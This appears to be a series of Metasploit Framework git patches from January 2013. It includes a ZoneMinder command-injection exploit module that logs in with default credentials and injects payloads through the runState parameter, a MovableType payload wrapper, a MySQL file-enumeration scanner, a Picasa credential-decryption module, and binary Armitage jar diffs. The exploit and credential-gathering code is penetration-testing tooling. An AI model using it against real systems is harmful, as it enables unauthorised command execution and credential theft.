'exec()' with user controlled data + from the 'runState' parameter. + }, + 'References' => + [ + ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'], + ], + 'Author' => + [ + 'Brendan Coles ', # Discovery and exploit + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x00", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash', + }, + }, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Jan 22 2013", + )) + + register_options([ + OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), + OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), + OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/']) + ], self.class) + end + + def check + + peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + data = "action=login&view=version&username=#{user}&password=#{pass}" + + # login and retrieve software version + print_status("#{peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if res and res.code == 200 + if res.body =~ /ZM - Login<\/title>/ + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.body =~ /v1.2(4\.\d+|5\.0)/ + return Exploit::CheckCode::Appears + elsif res.body =~ /<title>ZM/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + @peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = "action=login&view=postlogin&username=#{user}&password=#{pass}" + command = Rex::Text.uri_encode(payload.encoded) + + # login + print_status("#{@peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + print_good("#{@peer} - Authenticated successfully") + + # send payload + print_status("#{@peer} - Sending payload (#{command.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'data' => "view=none&action=state&runState=start;#{command}%26", + 'cookie' => "#{cookie}" + }) + if res and res.code == 200 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end + +end + From 8a59c7b8fb406dc9361545c7c8399de45da18605 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Tue, 22 Jan 2013 12:31:40 +0000 Subject: [PATCH 097/421] removed extra print_status() calls --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index a6fc2c99cc6e..40764c27b971 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -117,11 +117,9 @@ def http_send_raw(cmd, timeout=20) end def http_send_cmd(cmd) - print_status(cmd) pay = 'v0;use MIME::Base64;system(decode_base64(q(' pay << Rex::Text.encode_base64(cmd) pay << ')));return 0' - print_status(pay) http_send_raw(pay, 0.5) end end From 20b36cdf7a7039007ec96fc122bdb3da7cd2da0d Mon Sep 17 00:00:00 2001 From: Robin Wood <robin@digininja.org> Date: Tue, 22 Jan 2013 15:42:23 +0000 Subject: [PATCH 098/421] added extra checking for strict databases --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 09374fc9d1dc..8d371f10ee12 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -99,6 +99,16 @@ def check_dir dir :proto => 'tcp', :update => :unique_data ) + rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField + print_good("#{peer} - #{dir} is a file and exists") + report_note( + :host => rhost, + :type => "filesystem.file", + :data => "#{dir} is a file and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) rescue ::RbMysql::ServerError vprint_warning("#{peer} - #{dir} does not exist") rescue ::RbMysql::Error => e From fed4a836c634323c841ae1e127fec2cb6a8c2b26 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 20:29:57 +0200 Subject: [PATCH 099/421] Updated proof string for Web Differential Analysis Manipulatable responses => Boolean manipulation --- lib/msf/core/auxiliary/web/analysis/differential.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web/analysis/differential.rb b/lib/msf/core/auxiliary/web/analysis/differential.rb index 7ba764ed5c17..ee3c0c8aea98 100644 --- a/lib/msf/core/auxiliary/web/analysis/differential.rb +++ b/lib/msf/core/auxiliary/web/analysis/differential.rb @@ -122,7 +122,7 @@ def differential_analysis( opts = {}, &block ) http.if_not_custom_404( action, res['res'].body ) do # if this isn't a custom 404 page then it means that # the element is vulnerable, so go ahead and log the issue - fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.', + fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.', :payload => res['elem'].altered_value ) end end From 9671df44886b09db0fca58bb879b49f371f71abe Mon Sep 17 00:00:00 2001 From: Charles Smith <charles.smith@n2netsec.com> Date: Tue, 22 Jan 2013 15:46:47 -0500 Subject: [PATCH 100/421] Picasa 2 credentials are now also saved as loot This module used to save only Picasa 3 credentials as loot. Picasa 2 creds were displayed, but not saved. I've updated the module to save Picasa 2 credentials, and I also updated the output code to use print_good instead of print_status. --- .../gather/credentials/enum_picasa_pwds.rb | 62 +++++++++++-------- 1 file changed, 36 insertions(+), 26 deletions(-) diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index ff188cd1411c..5ec210987d0b 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -70,8 +70,7 @@ def decrypt_password(data) end def get_registry - psecrets = "" - + begin print_status("Looking in registry for stored login passwords by Picasa ...") @@ -80,15 +79,28 @@ def get_registry password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') - if username != nil and password != nil + credentials = Rex::Ui::Text::Table.new( + 'Header' => "Picasa Credentials", + 'Indent' => 1, + 'Columns' => + [ + "User", + "Password" + ]) + + + foundcreds = 0 + if username != nil and password != nil passbin = [password].pack("H*") pass = decrypt_password(passbin) if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") - secret = "#{username}:#{pass}" - psecrets << secret + print_status("Found Picasa 2 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + + foundcreds = 1 + credentials << [username,pass] + end end @@ -98,35 +110,33 @@ def get_registry password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') - credentials = Rex::Ui::Text::Table.new( - 'Header' => "Picasa Credentials", - 'Indent' => 1, - 'Columns' => - [ - "User", - "Password" - ]) if username != nil and password != nil passbin = [password].pack("H*") pass = decrypt_password(passbin) if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") + print_status("Found Picasa 3 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + foundcreds = 1 credentials << [username,pass] - path = store_loot( - "picasa.creds", - "text/csv", - session, - credentials.to_csv, - "decrypted_picasa_data.csv", - "Decrypted Picasa Passwords") - - print_status("Decrypted passwords saved in: #{path}") end end + + if foundcreds == 1 + path = store_loot( + "picasa.creds", + "text/csv", + session, + credentials.to_csv, + "decrypted_picasa_data.csv", + "Decrypted Picasa Passwords") + + print_status("Decrypted passwords saved in: #{path}") + else + print_status("No Picasa credentials found.") + end rescue ::Exception => e print_error("An error has occurred: #{e.to_s}") From f2beb5bf19ffbc28f6c41b05d0cf801a0aa29f10 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:39:16 +0200 Subject: [PATCH 101/421] Auxiliary::Web#process_vulnerability: payload fix Updated to pick the largest matching payload from the payload list. --- lib/msf/core/auxiliary/web.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index b91b7536f12d..a707e6a4ae1b 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -250,7 +250,9 @@ def process_vulnerability( element, proof, opts = {} ) if !(payload = opts[:payload]) if payloads - payload = payloads.select{ |p| element.altered_value.include?( p ) }.first + payload = payloads. + select { |p| element.altered_value.include?( p ) }. + sort_by { |p| p.size }.last end end From 0d564c1ce8ac0578bfb2cf582aced1d7e71cdaa7 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:40:30 +0200 Subject: [PATCH 102/421] Auxiliary::Web::Analysis::Timing Updated to pick the largest matching payload from the payload list. --- lib/msf/core/auxiliary/web/analysis/timing.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web/analysis/timing.rb b/lib/msf/core/auxiliary/web/analysis/timing.rb index 9d6b3e564745..32608cf07745 100644 --- a/lib/msf/core/auxiliary/web/analysis/timing.rb +++ b/lib/msf/core/auxiliary/web/analysis/timing.rb @@ -54,7 +54,8 @@ def timeout_analysis( opts = {} ) timeout = opts[:delay] seed = p.altered_value.dup - payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first + payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }. + sort_by { |p2| p2.size }.last # 1st pass, make sure the webapp is responsive if_responsive do From 6b5c6c3a0cb5ab92a0aed63b178498ab46da7e1c Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:41:36 +0200 Subject: [PATCH 103/421] Auxiliary::Web::Analysis::Differential Removed payload option from #process_vulnerability call --- lib/msf/core/auxiliary/web/analysis/differential.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/analysis/differential.rb b/lib/msf/core/auxiliary/web/analysis/differential.rb index ee3c0c8aea98..0d53c1236bc9 100644 --- a/lib/msf/core/auxiliary/web/analysis/differential.rb +++ b/lib/msf/core/auxiliary/web/analysis/differential.rb @@ -101,7 +101,7 @@ def differential_analysis( opts = {}, &block ) # save the response and some data for analysis responses[:good][elem.altered] << { 'res' => res, - 'elem' => elem + 'elem' => elem.dup } end end @@ -122,8 +122,7 @@ def differential_analysis( opts = {}, &block ) http.if_not_custom_404( action, res['res'].body ) do # if this isn't a custom 404 page then it means that # the element is vulnerable, so go ahead and log the issue - fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.', - :payload => res['elem'].altered_value ) + fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' ) end end end From 8c86c49d43c871d5e1e753f47f343e8483c141dd Mon Sep 17 00:00:00 2001 From: Raphael Mudge <rsmudge@gmail.com> Date: Tue, 22 Jan 2013 22:48:16 -0500 Subject: [PATCH 104/421] Armitage 01.23.13 This update to Armitage adds the ability to assign labels to hosts and create dynamic workspaces based on these labs. This update also adds helpers to configure USERNAME/PASSWORD options and EXE::Custom and EXE::Template. Several bugs were fixed as well. --- data/armitage/armitage.jar | Bin 3198776 -> 3201422 bytes data/armitage/cortana.jar | Bin 3198920 -> 3201417 bytes data/armitage/whatsnew.txt | 26 ++++ external/source/armitage/build.xml | 2 + external/source/armitage/resources/about.html | 2 +- .../armitage/resources/msfconsole.style | 1 + .../source/armitage/resources/msfrpcd_new.bat | 12 ++ .../armitage/scripts-cortana/cortanadb.sl | 27 +++- .../armitage/scripts-cortana/internal.sl | 21 ++- external/source/armitage/scripts/armitage.sl | 10 +- external/source/armitage/scripts/attacks.sl | 8 + external/source/armitage/scripts/gui.sl | 2 +- external/source/armitage/scripts/jobs.sl | 67 +-------- external/source/armitage/scripts/menus.sl | 23 +++ external/source/armitage/scripts/passhash.sl | 31 ++++ external/source/armitage/scripts/server.sl | 3 - external/source/armitage/scripts/targets.sl | 12 +- external/source/armitage/scripts/util.sl | 16 +- .../source/armitage/scripts/workspaces.sl | 23 +-- .../src/armitage/ArmitageApplication.java | 1 + .../source/armitage/src/cortana/Loader.java | 5 +- .../source/armitage/src/cortana/Main.java | 2 +- .../armitage/src/graph/NetworkGraph.java | 15 +- .../source/armitage/src/msf/DatabaseImpl.java | 142 +++++++++++++++++- .../source/armitage/src/msf/RpcCacheImpl.java | 2 + .../armitage/src/table/NetworkTable.java | 16 +- external/source/armitage/src/ui/ATable.java | 6 + .../source/armitage/src/ui/ZoomableImage.java | 2 + external/source/armitage/whatsnew.txt | 26 ++++ 29 files changed, 385 insertions(+), 118 deletions(-) create mode 100644 external/source/armitage/resources/msfrpcd_new.bat diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 5ccd4ac15a74d2250efd8513a419dde87aee1312..153f8f95c0a3a630595e86b91d6525cd8b693519 100755 GIT binary patch delta 191570 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 